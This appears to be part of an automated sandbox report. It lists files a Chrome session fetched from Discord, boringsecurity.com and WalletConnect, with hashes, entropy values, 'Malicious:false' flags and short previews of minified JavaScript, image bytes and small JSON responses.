                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/66888.e207ac8a6f2c14a9eaa9.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["66888"],{430568:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return A}}),n("222007"),n("70102"),n("843762"),n("424973");var r=n("37983"),s=n("884691"),a=n("414456"),i=n.n(a),o=n("817736"),l=n.n(o),u=n("118810"),d=n("446674"),c=n("407063"),f=n("845579"),h=n("901165"),m=n("62843"),p=n("315102"),S=n("402671"),E=n("866190"),v=n("115279");class T extends s.PureComponent{componentWillUnmount(){var e;null===(e=this.cancelLoadImage)||void 0===e||e.call(this)}getSrc(){let e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:this.props,{src:t,emojiId:n,emojiName:r,animated:s,shouldAnimate:a,isFocused:i,isInteracting:o,size:l="default"}=e,{hover:u}=this.state;if(null!=t)return t;if(null!=n){let e=v.EMOJI_SIZE_MAP[l];return p.default.getEmojiURL({id:n,animated:i&&!0===s&&(!0===a||u||!0===o),size:e})}if(null!=r)return S.default.getURL(r)}render(){var e;let t;let{emojiName:n,animated:a,className:o,size:l="de
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):164
                                                                          Entropy (8bit):5.223048228360733
                                                                          Encrypted:false
                                                                          SSDEEP:3:tLvNR9dXKq8NR9dXLZHKVRNxDVhC7DZRMYqJGfwHF5VXRZeXjdQlBSR5P1o:5vkrZur1VkDZqBGUF/RGjdZR2
                                                                          MD5:BC49611951AFB170ABFE4CF7C4DBC8AC
                                                                          SHA1:84CB7D7782C9921DD209F5E508530D4A77E882A0
                                                                          SHA-256:E1FFDE7256445DF9240924E2B221F3CC2E4E271A6050338085F4EBA2FAEB8692
                                                                          SHA-512:28A10F3494EA8A458EFBE6C65E92CBB3995C5F7C12F185103297997278A018474959A950C3472CB1F557E2B6311AE1032A30D4C9C9C845F5ECC0255DACD7E1D1
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/3c723e3c991fcd7cce58.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["26077"],{764930:function(p,s,c){"use strict";p.exports=c.p+"6191b2ecd48873bed773.woff2"}}]);
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                          Category:downloaded
                                                                          Size (bytes):2632
                                                                          Entropy (8bit):7.917348560260709
                                                                          Encrypted:false
                                                                          SSDEEP:48:RUqF+7brhFdIPHPbHL/UqiAhsOqnuaA6vCivoPAsXw53O7Cy698b+61g7Mf:RUo+7br5IvDL/VnsOq8oqAsw9O7ClKbD
                                                                          MD5:D62BFD6A0D4E300D8E50B60FBE10EAB0
                                                                          SHA1:251DE0BD2DBA5194B0DC337E371B017F673D2B40
                                                                          SHA-256:9407C0251BD7B695A38698D04BBB15514ED472E11797AEF7793B9ACB2B04FCFF
                                                                          SHA-512:2D803CDE870BF9BAC01AAD87C07EFB4086966DFE83C43D96BD9C9C4FCB64DF563450D6696E9DC8C8C7395086FC8749AF224E0DBAC90959717E881563E76958CF
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://explorer-api.walletconnect.com/w3m/v1/getWalletImage/7e1514ba-932d-415d-1bdb-bccb6c2cbc00?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1
                                                                          Preview:RIFF@...WEBPVP8X..............ALPHG....'@&m.._M...ED...2.$..*..)....W....F............?.........?......Tm9..VP8 ....pH...*....>I$.F".!."X. P..gn...o......9...G.....c.0'p..=.d.....y~g.'..la....O..B./......H_0...<=...t.t$...iEm.9...~..k.Yf~g...w....L.x0y.4....a[...c2 ..1....ji.p.....LdH..J.rm1.=......&.$O....Fv._.4G...1;..HG..Pu].Bm1.........z.u...1U.........i.y.+..a5.|......i...A..mM>C...B[...Uo...8..Q.}.6..&^;..!.b..x.1...F.....2....R.J._X..M..{tI.../..*...@.[..[LS.C.k..D.../............bzfQ.."...N..od...M.Tl.O.....^|.......x9."kux.zB0..[..SO.p0"K..k....2.gLAO`s..}.....w....xq.M!...\....<...q%.SV<.*}.~.?1.<...&. ..cZ...u....#o.j.........%.N?.H...<.$....<AZ...........O...X....X....tgfx...r>.#.M.Q....a.F".U.z[....L;a.Q~4..je..9....o#..v....]%.9M.&R....pL6,.......5...f...Q....#.L..R9+..jh...;:@.f.....9vr.!.xD.........b_.2:u/.Ap.y.E.'..gr1.......YX......2.C....s.w3G..6.....t..)z..Q$..+....."....;.._msH5..<..3.L..G...S....K..-:".....-=.}=
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (15478), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):15478
                                                                          Entropy (8bit):5.496935602013082
                                                                          Encrypted:false
                                                                          SSDEEP:192:XymT/3JdQahCbOM5is5RdctHT9xN23dAYdIc+pAHER6Q1Zg/T1CSON4GlH+Xxv3I:i3bOO5cdTPgacmt14T1ylehHw
                                                                          MD5:D9A7BC84A0387FD706A0E624EDD77B74
                                                                          SHA1:8E565DF900C36F5BF352496467815FD66ED00AD2
                                                                          SHA-256:EB3B65960679BDF41B48A7EE70419870B1DDEABC1BBE6DC508C81F98BC102005
                                                                          SHA-512:B1015C4A7896C1B258E13481F9F8B76211077765911840DB81897AAA16AFBD5083B4B00FC0B767993CEA467DA86CEA6BE34089E340AED51D2908C7D68A7B0C5D
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boringsecurity.com/_next/static/chunks/59-d0e28623b64e6b96.js
                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[59],{26145:function(e,t,r){r.d(t,{O$:function(){return E}});var n=r(39098),o=r.n(n),i=r(39404),s=r(65631),u=o().BN;let l=new s.Yd("bignumber/5.7.0"),a={},c=!1;class E{constructor(e,t){e!==a&&l.throwError("cannot call constructor directly; use BigNumber.from",s.Yd.errors.UNSUPPORTED_OPERATION,{operation:"new (BigNumber)"}),this._hex=t,this._isBigNumber=!0,Object.freeze(this)}fromTwos(e){return g(h(this).fromTwos(e))}toTwos(e){return g(h(this).toTwos(e))}abs(){return"-"===this._hex[0]?E.from(this._hex.substring(1)):this}add(e){return g(h(this).add(h(e)))}sub(e){return g(h(this).sub(h(e)))}div(e){let t=E.from(e);return t.isZero()&&N("division-by-zero","div"),g(h(this).div(h(e)))}mul(e){return g(h(this).mul(h(e)))}mod(e){let t=h(e);return t.isNeg()&&N("division-by-zero","mod"),g(h(this).umod(t))}pow(e){let t=h(e);return t.isNeg()&&N("negative-power","pow"),g(h(this).pow(t))}and(e){let t=h(e);return(this.isNegative()||t.i
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (18523)
                                                                          Category:downloaded
                                                                          Size (bytes):18578
                                                                          Entropy (8bit):5.496013183201371
                                                                          Encrypted:false
                                                                          SSDEEP:384:OiRqGMn7ydViJQSC0GahkHBecHLbwhg+7zwAtB52Uj7TLq:nRqGM7yTiWSIa4XbwnzwAHzj+
                                                                          MD5:6A056D7583533CA1F6F22EB59C25F71E
                                                                          SHA1:FD9008C3477BE5B59118CEC1D51E0D5942E9511A
                                                                          SHA-256:93AC8375EE2EC8788C40FFD8AFB828F87D2E3B7A718F346CD92D353F32CF3754
                                                                          SHA-512:86DCF1587B872D1F1AD53546446C7C828E23F86E5543DC1714CA0E43DD8F170F4AD95E5F721C4E5C28EEFF142597D5035D10D111BFAC39F4F8DBD3BC12423E49
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/37102.04489c88475d6b93636f.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["37102"],{565581:function(t,e,l){"use strict";t.exports=l.p+"f6bc645aead00959a690.svg"},154393:function(t,e,l){"use strict";t.exports=l.p+"fef39f80370ecfd7507d.svg"},280609:function(t,e,l){"use strict";t.exports=l.p+"c00cfaed1382bf7f33d4.svg"},595247:function(t,e,l){"use strict";t.exports=l.p+"c8576c5063b9f32889cb.svg"},551921:function(t,e,l){"use strict";t.exports=l.p+"27f92332674f9dacc1e9.svg"},153518:function(t,e,l){"use strict";t.exports=l.p+"f95c22b2edd5edef268b.svg"},959254:function(t,e,l){"use strict";l.r(e),l.d(e,{sync:function(){return c}}),l("70102");var n=l("913144"),a=l("605250"),i=l("149190"),s=l("49111");let o=new a.default("CloudSync");class u{constructor(t){this.message=t}}async function c(t,e){let l,a=arguments.length>2&&void 0!==arguments[2]?arguments[2]:null;n.default.dispatch({type:"GAME_CLOUD_SYNC_START",applicationId:t,branchId:e});try{if((l=await i.syncApplication(t,e,a)).type===s.CloudSyncRes
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:dropped
                                                                          Size (bytes):2959
                                                                          Entropy (8bit):4.564561843761891
                                                                          Encrypted:false
                                                                          SSDEEP:48:8VnUFcr6cH6mtufdizhBk6msu6m1bGRE01phaydEdREtM:CUFjcH6m8dizbk6msu6mInE/
                                                                          MD5:1D299086EDE63550EF233D25A345C769
                                                                          SHA1:09300F85C3AA5393F67783C91BD158445D28478D
                                                                          SHA-256:CAD078CC0384C997C71F49FCF31E40A2738BCEE5EC0039361ED6CE052E68E176
                                                                          SHA-512:D1B57F0E3CC6FE335B476E7BC9A423FA42BC206C7E8366556765E820F1BA05B1977F48D0D7FDB1DB7888C2239FAAEAD9D577BA88AFBF2D14C400C180F40906CB
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:<svg fill="none" height="105" viewBox="0 0 247 105" width="247" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><clipPath id="a"><path d="m20 20h65v65h-65z"/></clipPath><rect fill="#000" height="105" rx="12.9877" width="246.08"/><g fill="#fff"><g clip-path="url(#a)" clip-rule="evenodd" fill-rule="evenodd"><path d="m32.9185 23.9656h-9v8h-4v-8-4h4 9zm0 57h-9v-9h-4v9 4h4 9zm40 4h8 4v-4-9h-4v9h-8zm0-61v-4h8 4v4 8h-4v-8z"/><path d="m75.5167 39.5-22.5167-13-22.5167 13v26l22.5167 13 22.5167-13zm-23.4025 20.8462 13.1429-12-3.3713-3.6924-11.5947 10.5864-5.7668-4.436-3.0486 3.9631 7.4286 5.7143 1.6617 1.2782z"/></g><path d="m107.8 22.3957v7.6l-5.4-7.6h-2.4v14h3.2v-7.6l5.4 7.6h2.4v-14z"/><path d="m119.878 36.6757c4.02 0 7.28-3.16 7.28-7.28s-3.26-7.28-7.28-7.28-7.28 3.16-7.28 7.28 3.26 7.28 7.28 7.28zm0-3.12c-2.28 0-4.08-1.66-4.08-4.16s1.8-4.16 4.08-4.16 4.08 1.66 4.08 4.16-1.8 4.16-4.08 4.16z"/><path d="m137.359 22.3957h-10.4v3.08h3.6v10.92h3.2v-10.92h3.6z"/><path d=
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, baseline, precision 8, 156x156, components 3
                                                                          Category:downloaded
                                                                          Size (bytes):6407
                                                                          Entropy (8bit):7.928742760363145
                                                                          Encrypted:false
                                                                          SSDEEP:96:PXgL2fP1tIgFjlWE7ZmmwZdtllEMF3kRQ8xbVsZguB/qOaHpVC0CGbyJPW6jb6Fg:PQL2ltXaEtwZdtllj9osZh/M5lbygMD
                                                                          MD5:D0ECFB50FB55104676B5FF2A0A53B88C
                                                                          SHA1:1072AA722820A7C8865ED95726C82CBD61B5FC0E
                                                                          SHA-256:0BBEC1C42DD9376813221070F5475AF76CD985F75174958E3D106CFF048B4483
                                                                          SHA-512:E50EB075F5D87469DF93438BA5AF286814CFD6FF11BF15D60893D57D24AE2DE4B7B03F55519D04552298B19477DDDBC92A6B0FDBB9EF24F03EC43B47848E324B
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boring-security-cms.s3.amazonaws.com/thumbnail_5_F_Ry_lya_400x400_c386fc238e.jpeg
                                                                          Preview:.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((..........."........................................<.........................!1.."AQaq....2...#BR...$..3Cb...................................".......................!1.A."a2Q............?....Q.....Z..9#..z.'......P......@...(....R,A!(].92)...0|...<~...Fx.qD.....V.....v....m=:W%......G..9.r..f.d7.....Q.(...@.....f....7...1,.p..p6...X......1..\......W""...:^.9Q...x..I..=*.....Ti...Jn...|sGVrb5......@.8<.......4.. .....Z{..e....J...x=s.>..5.g.x.HVA.K.n...jr).`...q#.#....yW.&.W-.@s[&...U.^.MC..s..X..G...X..t..or.D.,..q....p5..8.I.1...O..|qU&...QT..Q.U.WgF(@q.......ks.. U(u..._h|.t.....3..."mq.H....K....h....B...Fp..:.)h*......K. ..k..C.<T....3.h....{n.D.G..:T7v....p...A4A/........L......j..&.HdX..-.C4....>B..(....u..@.s\$`)....4M........:sU.>....F.r....L.g.\<m..tj.>!......mP28..].non.T7%UA%...Dd...o.6..A.-j5h.......q...5..}
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 400 x 400, 8-bit colormap, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):26307
                                                                          Entropy (8bit):7.93058844547533
                                                                          Encrypted:false
                                                                          SSDEEP:768:v76boF0aeivHBNzg4nUcW/D+KIyS3Wb9osxkrAmt2g:QubNz9nUcOCoisOag
                                                                          MD5:AFE3193A4B5E82635ACF98884A807828
                                                                          SHA1:B038B2FA147786DFE106FBBCE503B29BDFAFC439
                                                                          SHA-256:0EE2607E0B6DE6593127402CFD44DF7939253AC7F29BCCEBD3363E6C9E479557
                                                                          SHA-512:E5BF9903F01EF1B2DDBACB5579B70CE15A2255A108C262E1839170129CDF9C70D65CF04614F0608116D86713D02777D8B018042487593D1F0F2F5723B92A2962
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR..............a......PLTE.%l.E..=..M..&l.H..D..?..;../y.O..L..O..G..E..=..4..1|.6..K..:..@..;..?..N..B..C..I..M..D..J..J..O.....%l.A..6..5..:..@..0{.8..=..<..;...x.D..C..B..2~.,u.1|./y.7..?..+t.@..>..3..9..F..>..9..7..%l.-w.*r.-v.4..E..)q.E..;..G..B..<..2}.C../z.H..5..(o.1}.0z.6..?..+s.&m.*s.K..I..=..A..3..4..J..'n.L..J..G..(p.O..:..D..8..8...w.M..,v.H..4..&l.4..N..I..)p.(p.>..'n.)q.F..?..&l.I..M..H..L..?..3..F..A..K..3~.:..=..'o.'m.?...y.2}.,t.G..1|.3.....=..N..D..<..*r.<..6.^|.........[.....K..G..;.]...=.....1}.*x.O./W..1..4.....;.....T..&s.7..-|.0..8..5}....,{.=..)v......2^.......5c....t...P..(t@j..8..:.........9.Nu....U{..=.d.....l.."U..7.....E.....Io..K..?....|.."L..F.....;.]z..B..5...../~.6........B..C..>..A..I.....C..G..E..D..H..@.@c..+..G..P..5..;.."q.:..9..7..D..8..?...,....!tRNS.===.............................l.b...cQIDATx..{|WU....=w..}..L.{.v".$...a.....a.0..?@K...CZ..H......!.......("B$.........T..(...eS.]..|......k.}N....?..*e......V.?.I....o..o
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):113
                                                                          Entropy (8bit):4.460750616283363
                                                                          Encrypted:false
                                                                          SSDEEP:3:YGKjl8jwDEYRrajpHV+wJ6ARORzACDEYkayjY6v:YGKjDRrajpHV9LorMcE
                                                                          MD5:30B15D37E2F2C6C09F35BCC56B64571A
                                                                          SHA1:A5566ADA13410C39A4059BEC0FF59D51316D89CD
                                                                          SHA-256:BE58D93E5BC2C48B3FB9C87BD7140109630195E84CCE67701FCCABCF5256BFE0
                                                                          SHA-512:EE8E8192B3120D7A2FC9DCE3585D87FAAF689B2E03046C8B7F533FE3CBA408BF0E8614CA2AACD6ED21A206B4B461ECA507D5B38D01839CA9AC5B93971D1F7B10
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:{"consent_required":false,"country_code":"US","promotional_email_opt_in":{"required":false,"pre_checked":false}}.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (4116), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):4116
                                                                          Entropy (8bit):5.302402759901428
                                                                          Encrypted:false
                                                                          SSDEEP:96:++qcJE9qkuWlRvs9nayPE8arVCzLBYV9W3Sc2W5CSL3IqM:++qj9+WllIayRar8mmp5P9M
                                                                          MD5:297D3774038AB2247FA8E6CBA445AF33
                                                                          SHA1:D89F5E73171F3ED709D2A7BD3BE38CEE6D8E829F
                                                                          SHA-256:0AF5F82D783A1CEAB62B76F14F6476C8D500E6AD067C67246807A58AF4CB73C0
                                                                          SHA-512:D9EF418B56BB98628416A8C1D20E1EEC1F9E42B0BA6A9D88226970A6FBF4E0D339DC0DE4F67620CE31B8371713E63001D6C86E99EFD8BE574B29C082B5507E19
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boringsecurity.com/_next/static/chunks/webpack-2f410aecd915a041.js
                                                                          Preview:!function(){"use strict";var e,t,n,r,o,u,i,c,f,a={},d={};function l(e){var t=d[e];if(void 0!==t)return t.exports;var n=d[e]={id:e,loaded:!1,exports:{}},r=!0;try{a[e].call(n.exports,n,n.exports,l),r=!1}finally{r&&delete d[e]}return n.loaded=!0,n.exports}l.m=a,e=[],l.O=function(t,n,r,o){if(n){o=o||0;for(var u=e.length;u>0&&e[u-1][2]>o;u--)e[u]=e[u-1];e[u]=[n,r,o];return}for(var i=1/0,u=0;u<e.length;u++){for(var n=e[u][0],r=e[u][1],o=e[u][2],c=!0,f=0;f<n.length;f++)i>=o&&Object.keys(l.O).every(function(e){return l.O[e](n[f])})?n.splice(f--,1):(c=!1,o<i&&(i=o));if(c){e.splice(u--,1);var a=r();void 0!==a&&(t=a)}}return t},l.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return l.d(t,{a:t}),t},n=Object.getPrototypeOf?function(e){return Object.getPrototypeOf(e)}:function(e){return e.__proto__},l.t=function(e,r){if(1&r&&(e=this(e)),8&r||"object"==typeof e&&e&&(4&r&&e.__esModule||16&r&&"function"==typeof e.then))return e;var o=Object.create(null);l.r(o);va
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (37729)
                                                                          Category:dropped
                                                                          Size (bytes):37730
                                                                          Entropy (8bit):4.558999762007296
                                                                          Encrypted:false
                                                                          SSDEEP:384:LKJUdLOH0Db+C6Ptwa0p0BuJULsBrgMDo+oaXbaJh3EjerSODYUKHRHoOiU3:LAUdKHHZuJb/P1Xb0jSUKxx3
                                                                          MD5:1076C7D97C6B4E55DE5152FEDFC2EBDA
                                                                          SHA1:ABEADBBF31AF274B5CA269E78FA77488E60AF06C
                                                                          SHA-256:8C28638A73FDE74C08F9A4D9281A191EAFB5B989141DBF9C8B84743B2BF8EB62
                                                                          SHA-512:5B5C1D27DF0671D8A18A60FF838E49EFCCDF678F34D9F5E65DFF2644567C1A8B927BB3B0E4E3377AAF5E28253C05283C8EFBE3F4D3A4205D80FEBBF072A0DA51
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:{"fingerprint":"1183449390510252082.tKRTKa5xZWUxlBP0qvgVHcNrg8g","assignments":[[4130837190,0,10,-1,0,1800,0,0],[4181417939,0,1,-1,6,8360,0,0],[2810205487,1,1,-1,3,2636,0,0],[3316720711,0,1,-1,1,4168,0,0],[2617218444,4,1,-1,2,4288,0,0],[3035674767,0,1,-1,0,3734,0,0],[1609782151,0,1,-1,2,5305,0,0],[3354177721,0,1,-1,0,2355,0,0],[3643362751,0,1,-1,0,6324,0,0],[3753034466,1,2,-1,0,6047,0,0],[2854861606,0,1,-1,1,5495,0,0],[1913882179,0,1,-1,2,1185,0,0],[1567199723,0,1,-1,1,1895,0,0],[454783470,4,1,-1,0,7329,0,0],[3615787841,0,1,-1,0,4284,0,0],[3450899088,1,1,-1,0,6324,0,0],[2292925561,0,1,-1,0,681,0,0],[3656796460,3,0,-1,3,1795,0,0],[1176769702,1,1,-1,2,9824,0,0],[1814483290,0,1,-1,0,6283,0,0],[4221006726,0,1,-1,0,5362,0,0],[4156073260,3,2,-1,0,4055,0,0],[3482807542,13,1,-1,1,3756,0,0],[1398673921,1,1,-1,0,6776,0,0],[2532700533,0,1,-1,0,5309,0,0],[1312831343,0,2,-1,0,590,0,0],[3557480712,0,1,-1,0,3555,0,0],[1214828025,0,1,-1,0,8685,0,0],[853403133,4,1,-1,0,9632,0,0],[2491005019,4,1,-1,0,81
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (29075)
                                                                          Category:downloaded
                                                                          Size (bytes):29130
                                                                          Entropy (8bit):5.497998785216182
                                                                          Encrypted:false
                                                                          SSDEEP:384:AKErIxCp2vUvbia+9rOpfYy15d7uCd3nc9iKf/yffP1clELPXFnzMFt6Sc3i8Pq:NAIYiUvI9rOfYyZ7uus3SfjFNS8q
                                                                          MD5:5DB60BF02B57BFAB68177935BDBB851C
                                                                          SHA1:84A473519B636F92E22F9E29AFCA7A66CE2DB5D0
                                                                          SHA-256:8026AC6C67EB93DDA6936F257ED8A2AD841C400EAFFC943AC5160E5733AD46CF
                                                                          SHA-512:27DEEB166CC028AEF96F70906BF0BC1FF99CA90FB085A2672D082FB993653361D74D509E3486864FE1232E700127AC9834B294B6E9F2ECE3D1F033A861F4B386
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/72870.d7e30a37a080f43af084.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["72870"],{375822:function(e,t,l){"use strict";var a,i,n,r,u,s;l.r(t),l.d(t,{HeaderRecord:function(){return o},FindResultDirections:function(){return a},AutocompleterResultTypes:function(){return i},AutocompleterQuerySymbols:function(){return n}});class o{constructor(e){this.id=e,this.text=e}}(r=a||(a={})).UP="UP",r.DOWN="DOWN",(u=i||(i={})).GUILD="GUILD",u.TEXT_CHANNEL="TEXT_CHANNEL",u.GROUP_DM="GROUP_DM",u.VOICE_CHANNEL="VOICE_CHANNEL",u.USER="USER",u.HEADER="HEADER",u.APPLICATION="APPLICATION",u.SKU="SKU",u.LINK="LINK",(s=n||(n={})).USER="@",s.TEXT_CHANNEL="#",s.VOICE_CHANNEL="!",s.GUILD="*",s.APPLICATION="$"},195547:function(e,t,l){"use strict";function a(e,t){if(e.score===t.score){var l,a,i,n,r,u;let s=null!==(n=null!==(i=e.sortable)&&void 0!==i?i:null===(l=e.comparator)||void 0===l?void 0:l.toLocaleLowerCase())&&void 0!==n?n:"",o=null!==(u=null!==(r=e.sortable)&&void 0!==r?r:null===(a=t.comparator)||void 0===a?
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 400 x 400, 8-bit colormap, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):21606
                                                                          Entropy (8bit):7.96300029317678
                                                                          Encrypted:false
                                                                          SSDEEP:384:ft6D2hQg+GGoQjpFmOW4zvPODvW8321IGKr8b7totHKQxza1TtdGB:fo2hQfGbEFLfDOR27bytHKZ1va
                                                                          MD5:967AB5127AFC603A2AC801870D4A7B69
                                                                          SHA1:1CB12158E9DF39D80AB0AE1D7937CD810638C753
                                                                          SHA-256:3C6B364FD65401467660BBB716B74E9D1F7836393D3EB45DCEA60AB44F0633E6
                                                                          SHA-512:ED36071CFA6637F858EE31DFF8BD0EED91895695773B7AB129383850E6197545C38B3F4B844553E3CFD10B03DFCB747BAB64E6C7232DF9A0288681AC2BDE6DB8
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR..............a......PLTEGpL'DGC..q..&AD&ACr..&ABX..(KL+NQ-RT.TVZ..O..i..+MO+NPO..E..U..=y|p..\..*LNc..j..G..k..j..\..k..<w{f..'EG@..o..m..3ad4cfn..V..9orm..C..g..'EF(GIi..'CE)IK+OQ*KMq..l...UWR..(GIM..3acc..o..3adH..]..0[]b..)HJ(GI4dg,QSF..[..S..X..-RU2^`M..5eh7il/VY6hk'CED..F..(FGA..k..C..J..A..m..'EGT..7jm...............'DF%@A&BC...&AB&CE...$>?...!67......#;<K....."79.)*#:;."#. !-TV"9:C../VY7kn%?AB..8nq.'(D..$=?F..*JLO..)HJ@..(FH.,-E.../0c..H..,QS:pt?|.I..@~.A..$=>*LN>z~ 46.23=x|;swJ..f..#<=b..G..Q..2^a+NP%?@h..$<>l..<uy6hkg...%&0Z]e..E..Y..]..G..N..1\_5dg`..4be(GIR..P..X..3`cd.."8:L..s../X[U.....M.....S..5fiT..T..V..a..W..g..\...02]..^..[..:ru)GJK..,PR<wz...j..Z........!!!...........&&&...................***...OOO...UUU...|||DDDIII///vvvZZZ@@@666333:::===gggnnnjjjrrr^^^```ccc.R....._tRNS....;.......<<.a%.;.<..L.&.Xt.D....wU..........0....x.<........X..........k.....*.f.r.{..P.IDATx...\Sg...qfd.Qg:V.vy..j.s.v.u......No.....9'..,.B.N....$.......YDx..
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 828 x 276, 8-bit/color RGB, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):379566
                                                                          Entropy (8bit):7.955527042604531
                                                                          Encrypted:false
                                                                          SSDEEP:6144:blTeORyWhDfYldGtJLhUiDF6dYPhx2IL6wpxQLFgtw/DE1/lh6dh0c+BBSltueAe:ByOEldGtlj4dYPyILtp2RgtgA/lQszBg
                                                                          MD5:D3AC9164D7F113A7C9F8DB140A9DC588
                                                                          SHA1:BD2324250E8A7EE5D20CFB76B398E9581F289BFF
                                                                          SHA-256:EF96A0737DACFBB4295343CEC69651FE068A0EC07BEAE7174BB36856C28E132C
                                                                          SHA-512:90EFB0F12E24A4250CBDFAA6072A2229478C43283C09D919F6D046C175C47E8F2253321F65196DB3FDA44C7423BA998D3C650EF62647156C66F0224849558B60
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR...<.........a.......sRGB....... .IDATx^L..#9.%.W........^..OX........vweD..f..2.j.J>.0.F#....=z.............fF..D..........IL..a....`..L..q.................D.........A..4.P...Z..Dhf.\U<...s-.H"daD..!"fBB.{..3..;....3!"F...............D.....f.."2.jM.."b&f.sf.{.....3..s.&5........Mu.ID.l.".."..k.!..o..v<...?..G.."....zk."LDs.......<..m.y....wD\k....?..v....j-..#.m.8..."..,.2s.... "..@.+..1.!.........D$......hmcF..@. B...f.......H.y.1TU...~.........I...DH..N.D...("Ld..h..Z+.3.3..1.q<......#!2..gdB.S&.9....m..3c.._.E83....vW..>[k?~.......|.k2..x.....o....Xd.af.q...G.....|.c..9.),[..q03.......=3..">.........1.~.k..x...4#...>>...i.f.........|..k..v?.H....f.p....5..8....o_.4ms..b...Q.e.y.....}.}........|>k."@..Z..57...........V0.@DDW..9.....22..9..eK...y>=.5.i....DH...n....L..n..]:.......DL.`n.P/w73D..Dl.=...7&...[..$fUE..<.|...f>....>>>.}...s"...nfe..q..##<Zk...6..0D<..........y| ...?.....?~..o..y....{#b...._~..l.......
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):476610
                                                                          Entropy (8bit):5.518277160470867
                                                                          Encrypted:false
                                                                          SSDEEP:3072:3gF7hv8ia5vbCcpgS61axENtQJdMbGpLsev6ns73baRKPrGe9bV0uUXzhfkE+deX:3vGbCNvmsqRKPrJ94hfk3DxvpdO7
                                                                          MD5:5B781F449D0C65A0735BF671853D1773
                                                                          SHA1:6037D777017073CE4DA1371DD392CF5A2E0DB1CC
                                                                          SHA-256:85F7DCBF549B1FA9F68CB2AC905D1BEEDB68AB0CEEF91990CAEF52AC60C8E4F9
                                                                          SHA-512:1C13DF75C6BAA434642E270D8B2B7C06E5EF19644B1C972B5B86673D370F6646501F612343FCA354939C24D5EA8823EFF3BEB86281E5437B64FEFCC69619829B
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/3726.e3e95df69f8cf8ff7aa8.js
